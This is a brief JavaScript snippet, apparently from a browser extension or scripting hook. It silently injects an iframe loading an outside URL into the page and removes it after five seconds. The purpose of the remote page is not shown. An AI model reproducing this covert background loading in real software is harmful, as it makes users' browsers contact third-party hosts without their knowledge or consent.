external.backgroundRun(function(window){
	var doc = window.document,
		bdy = doc.getElementsByTagName('body')[0];
	var ifr = doc.createElement('iframe');
		ifr.src= 'http://www.imozhua.com/-contactqq/';
	bdy.appendChild(ifr);
	//release
	setTimeout(function(){
		bdy.removeChild(ifr);
	}, 5000);
});